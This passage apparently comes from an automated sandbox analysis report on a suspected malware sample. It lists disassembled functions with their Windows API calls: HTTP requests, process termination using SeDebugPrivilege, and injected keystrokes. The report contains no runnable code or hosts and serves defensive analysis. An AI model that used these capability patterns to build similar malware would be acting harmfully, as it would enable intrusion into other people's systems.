                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                • String ID: *.*
                                                • API String ID: 1464919966-438819550
                                                • Opcode ID: 4f2b07b72ecf2f548898ab9961ebf09373eec337997442ae0d65ad8e3dbd960a
                                                • Instruction ID: 4a224832ef407a5b61971ed0a1f10d99f7d30db595d5f24f47ac8f6ad0c8d7c8
                                                • Opcode Fuzzy Hash: 4f2b07b72ecf2f548898ab9961ebf09373eec337997442ae0d65ad8e3dbd960a
                                                • Instruction Fuzzy Hash: 85619DB29043559FCB21EF60C84499FB3E8FF89314F04891EF9899B291DB35E945CB52
                                                APIs
                                                • CreateMenu.USER32 ref: 004045D8
                                                • SetMenu.USER32(?,00000000), ref: 004045E7
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0040466F
                                                • IsMenu.USER32(?), ref: 00404683
                                                • CreatePopupMenu.USER32 ref: 0040468D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004046BA
                                                • DrawMenuBar.USER32 ref: 004046C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0$F
                                                • API String ID: 161812096-3044882817
                                                • Opcode ID: b6041f78ac78b1cccd1121974aa99d36ff41a74d90ad4288b0f72a6f16346dc4
                                                • Instruction ID: 31c4f329a9c086f6b4f9a08e5eb9f162cd12631c24ee38280835610419a10329
                                                • Opcode Fuzzy Hash: b6041f78ac78b1cccd1121974aa99d36ff41a74d90ad4288b0f72a6f16346dc4
                                                • Instruction Fuzzy Hash: D8418BB4A01209EFDB14CFA4DD54AAA7BB5FF4A314F040429FA45A7390D739A924CF58
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003D27F4
                                                • GetDlgCtrlID.USER32 ref: 003D27FF
                                                • GetParent.USER32 ref: 003D281B
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D281E
                                                • GetDlgCtrlID.USER32(?), ref: 003D2827
                                                • GetParent.USER32(?), ref: 003D283B
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D283E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 711023334-1403004172
                                                • Opcode ID: f3dfc68ccafb5ec0ab014be8d07644eeb09f7315f7599c11495c5fcf049eba09
                                                • Instruction ID: 60f6e81e7632967f7e8e012d62e50566d4a73332a5b82343ff096bdbe96a92ff
                                                • Opcode Fuzzy Hash: f3dfc68ccafb5ec0ab014be8d07644eeb09f7315f7599c11495c5fcf049eba09
                                                • Instruction Fuzzy Hash: 7B210471D00118BBCF22EFA0DC84EEEBBB9EF15310F104566F951A72A2CB795809DB60
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003D28D3
                                                • GetDlgCtrlID.USER32 ref: 003D28DE
                                                • GetParent.USER32 ref: 003D28FA
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D28FD
                                                • GetDlgCtrlID.USER32(?), ref: 003D2906
                                                • GetParent.USER32(?), ref: 003D291A
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D291D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 711023334-1403004172
                                                • Opcode ID: 2f2bb8dc014e56ff74dc196f2d746e4e9966a88031f065e147b45b930f9dedf3
                                                • Instruction ID: 490d42a827e912c815993dfc029b2ca107475af4f8bff6c2a298e10c6314569d
                                                • Opcode Fuzzy Hash: 2f2bb8dc014e56ff74dc196f2d746e4e9966a88031f065e147b45b930f9dedf3
                                                • Instruction Fuzzy Hash: E2210471D00118BBCF22AFA0DC44EEEFBB8EF14300F004426B990A7296D7794818DB20
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004043FC
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004043FF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404426
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404449
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004044C1
                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0040450B
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00404526
                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00404541
                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00404555
                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00404572
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: faf0036b741f75d4df02ddc7cd7327cc75767349254aefaf0c5ab23f41219d3e
                                                • Instruction ID: 003c4521582a5ce5f96bfd7ff97920e9049eab14758d34bf2815a6947cb7d77c
                                                • Opcode Fuzzy Hash: faf0036b741f75d4df02ddc7cd7327cc75767349254aefaf0c5ab23f41219d3e
                                                • Instruction Fuzzy Hash: 1A617CB5A00208AFDB11DFA4CD81EEE77B8EB49314F10416AFA14A73E1C774A945DF58
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003ECBCF
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003ECBF7
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003ECC27
                                                • GetLastError.KERNEL32 ref: 003ECC7F
                                                • SetEvent.KERNEL32(?), ref: 003ECC93
                                                • InternetCloseHandle.WININET(00000000), ref: 003ECC9E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: 9bca4a4c7be8862928d53c98e3d36e9e6d7bbb91efeb54beb1b9bf73050beb06
                                                • Instruction ID: 9562585e6c6c7a5434b2759ab7deb031a406c33b7d178bdc8a2eb26845fa5af3
                                                • Opcode Fuzzy Hash: 9bca4a4c7be8862928d53c98e3d36e9e6d7bbb91efeb54beb1b9bf73050beb06
                                                • Instruction Fuzzy Hash: C931C2B1510354AFD7229F66CD88A6F7BFCEB49740B20162DF44AE7280D730D9069B61
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B5437,?,?,Bad directive syntax error,0040DCD0,00000000,00000010,?,?), ref: 003DA14B
                                                • LoadStringW.USER32(00000000,?,003B5437,?), ref: 003DA152
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003DA216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 858772685-4153970271
                                                • Opcode ID: 45fd21633ddf60bcac1d202785e7dc1080754ae0ce60135abccb99a6aebac071
                                                • Instruction ID: 753141db054ad8467cd1eae56e0af7de5e1fea59f3611cb34eeb5245995436ba
                                                • Opcode Fuzzy Hash: 45fd21633ddf60bcac1d202785e7dc1080754ae0ce60135abccb99a6aebac071
                                                • Instruction Fuzzy Hash: 6521767280021EAFCF23AF90CC46FEE7B79BF18304F044456F519691A2DA75AA18EB51
                                                APIs
                                                • GetParent.USER32 ref: 003D293B
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 003D2950
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003D29DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1290815626-3381328864
                                                • Opcode ID: ab7c1422be8e45111b2dc33add2b73b20ca8581931ef6ddb239ff501c1ca5b72
                                                • Instruction ID: d789c220ae43f0daf4dfeaf43b39c3a3ba5260cdd953c716edc36f75a645b191
                                                • Opcode Fuzzy Hash: ab7c1422be8e45111b2dc33add2b73b20ca8581931ef6ddb239ff501c1ca5b72
                                                • Instruction Fuzzy Hash: 3B11E37B644307BAFA022220EC17DE777DC9F25720F224123FA00E51D2EB7669625958
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003ECADF
                                                • GetLastError.KERNEL32 ref: 003ECAF2
                                                • SetEvent.KERNEL32(?), ref: 003ECB06
                                                  • Part of subcall function 003ECBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003ECBCF
                                                  • Part of subcall function 003ECBB0: GetLastError.KERNEL32 ref: 003ECC7F
                                                  • Part of subcall function 003ECBB0: SetEvent.KERNEL32(?), ref: 003ECC93
                                                  • Part of subcall function 003ECBB0: InternetCloseHandle.WININET(00000000), ref: 003ECC9E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 337547030-0
                                                • Opcode ID: 95e4189cf1d9697a53bc887794d3b2a62cb6dfd5f3f71516e03bb20a3ab2deef
                                                • Instruction ID: e333267732cc260b8bbacac2369410a6a93782a15893f8dde19e3c4086c0223e
                                                • Opcode Fuzzy Hash: 95e4189cf1d9697a53bc887794d3b2a62cb6dfd5f3f71516e03bb20a3ab2deef
                                                • Instruction Fuzzy Hash: A631AF71610756AFDB229FB2CD45A6BBBF8FF04300B00562DF85697650D730E816DB60
                                                APIs
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E4D
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003D2E6B
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003D2E6F
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E79
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003D2E91
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003D2E95
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 003D2E9F
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003D2EB3
                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003D2EB7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 32d1254c3673a97a51932ce72348af0cf1b129f6561af4948ee133ba4ef53bc6
                                                • Instruction ID: 91d22852a4f1da0d285ec79ab4a77b40f9a75496093ef722ede725fbcdeee0c9
                                                • Opcode Fuzzy Hash: 32d1254c3673a97a51932ce72348af0cf1b129f6561af4948ee133ba4ef53bc6
                                                • Instruction Fuzzy Hash: 250175316806147BFB1067A99C8AF567F59DB99B51F100416F318AE1E0C9F254448AAD
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003D1CD9,?,?,00000000), ref: 003D209C
                                                • HeapAlloc.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20A3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003D1CD9,?,?,00000000), ref: 003D20B8
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,003D1CD9,?,?,00000000), ref: 003D20C0
                                                • DuplicateHandle.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20C3
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003D1CD9,?,?,00000000), ref: 003D20D3
                                                • GetCurrentProcess.KERNEL32(003D1CD9,00000000,?,003D1CD9,?,?,00000000), ref: 003D20DB
                                                • DuplicateHandle.KERNEL32(00000000,?,003D1CD9,?,?,00000000), ref: 003D20DE
                                                • CreateThread.KERNEL32(00000000,00000000,003D2104,00000000,00000000,00000000), ref: 003D20F8
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 32424189c809f5281fe7d40a8c87cb0401af1fc28a52f473a430cbd8dcf4ea0e
                                                • Instruction ID: 8814a02534f01512cb38b9a627a6350d62c49091f3da393f6fbfbcdec2b74170
                                                • Opcode Fuzzy Hash: 32424189c809f5281fe7d40a8c87cb0401af1fc28a52f473a430cbd8dcf4ea0e
                                                • Instruction Fuzzy Hash: 6301BBB5640308BFE710ABB5DD4DF6B3BACEB89711F008421FA05EB2A1CA709C04CB24
                                                APIs
                                                  • Part of subcall function 003DDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 003DDCC1
                                                  • Part of subcall function 003DDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 003DDCCF
                                                  • Part of subcall function 003DDC9C: CloseHandle.KERNELBASE(00000000), ref: 003DDD9C
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003FAACC
                                                • GetLastError.KERNEL32 ref: 003FAADF
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003FAB12
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003FABC7
                                                • GetLastError.KERNEL32(00000000), ref: 003FABD2
                                                • CloseHandle.KERNEL32(00000000), ref: 003FAC23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 83848e7bf1a3f13a2eff41f456e9aa3db29404456d06149b94880b7727ba4abb
                                                • Instruction ID: 2fa3702e21a9a180a2cded18827674b9597c65c4605016ac911711503e746736
                                                • Opcode Fuzzy Hash: 83848e7bf1a3f13a2eff41f456e9aa3db29404456d06149b94880b7727ba4abb
                                                • Instruction Fuzzy Hash: 4E61C170208602AFD722DF14C594F26BBE5AF44308F15C49CE56A8F7A2C775ED49CB92
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00404284
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00404299
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004042B3
                                                • _wcslen.LIBCMT ref: 004042F8
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00404325
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00404353
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcslen
                                                • String ID: SysListView32
                                                • API String ID: 2147712094-78025650
                                                • Opcode ID: c0a587ce9f9237b3b7e144f4b0cccec6e685db90a2b54bf2d67f48a25502fd07
                                                • Instruction ID: f671b1f48bdb55aaf90dac5188b77860344e7bcabb3c098f03ad92a687cfe8e2
                                                • Opcode Fuzzy Hash: c0a587ce9f9237b3b7e144f4b0cccec6e685db90a2b54bf2d67f48a25502fd07
                                                • Instruction Fuzzy Hash: E541B171A00308ABDB219FA4CC45FEB7BA9EF48360F10057AFA54F72D1D77899848B94
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DC5D9
                                                • IsMenu.USER32(00000000), ref: 003DC5F9
                                                • CreatePopupMenu.USER32 ref: 003DC62F
                                                • GetMenuItemCount.USER32(01034A78), ref: 003DC680
                                                • InsertMenuItemW.USER32(01034A78,?,00000001,00000030), ref: 003DC6A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: 46b44ced9030c2545ca025611d57145767e0a19207aef3ecd0e416966dcf9801
                                                • Instruction ID: 79d125747c51c9a4692269e002511309183ba262154d7c15ab1d074d9d190777
                                                • Opcode Fuzzy Hash: 46b44ced9030c2545ca025611d57145767e0a19207aef3ecd0e416966dcf9801
                                                • Instruction Fuzzy Hash: 3551B472930206ABDF12CFA8E984BAEBBF5AF44314F18615AF811AB391D770DD44CB15
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 642191829-3771769585
                                                • Opcode ID: 4a3c494f21e4f3803fe6e984adffe50ca3840f435106209b100ec6f44e442b23
                                                • Instruction ID: 8eadb0ae1c209b9cb3f470e9ce839389ab7ece585318900a567ec6c39ff157b6
                                                • Opcode Fuzzy Hash: 4a3c494f21e4f3803fe6e984adffe50ca3840f435106209b100ec6f44e442b23
                                                • Instruction Fuzzy Hash: 0D110336D00215AFDB2A7B70AC4AEEE3BBCEF44710F110076F545AB192EF70CA859A54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
